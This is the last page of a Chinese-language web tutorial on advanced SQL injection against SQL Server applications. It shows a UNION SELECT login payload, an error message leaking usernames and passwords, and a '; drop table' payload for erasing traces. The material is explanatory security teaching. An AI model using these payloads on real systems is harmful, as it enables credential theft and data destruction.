2006-11-25

SQL Server应用程序高级SQL注入(上)

来源: 本站 作者:佚名 评论 0 条
 

Username:'' union select ret,1,1,1 from foo— 

Microsoft OLE DB Provider for ODBC Drivers error ''80040e07'' 

[Microsoft][ODBC SQL Server Driver][SQL Server]

Syntax error converting the varchar value '': admin/r00tr0x! 

guest/guest chris/password fred/sesame'' to a column of data type int. 

/process_login.asp, line 35

然后丢弃(删除)表来清楚脚印:

Username:''; drop table foo—

这个例子仅仅是这种技术的一个表面的作用。没必要说,假如攻击者能够从数据库中获得足够的错误西,他们的工作就变的无限简单。


共5页: 上一页 [1] [2] [3] [4] 5 下一页
(本文仅表明作者个人观点,不代表本站及其管理员立场.) 推荐 收藏 投稿 打印 返回 关闭
上一篇:SQL Server连接中的常见错误  
下一篇:SQL Server查询设计:避免10个错误
    评论加载中…
 热门排行
 推荐文章
     

 相关文章
网站首页  -  网站地图 -   站长论坛  -  网站投稿  -    -  网站管理
Copyright © 2008 芜湖站长站 All Rights Reserved 皖ICP备07500611号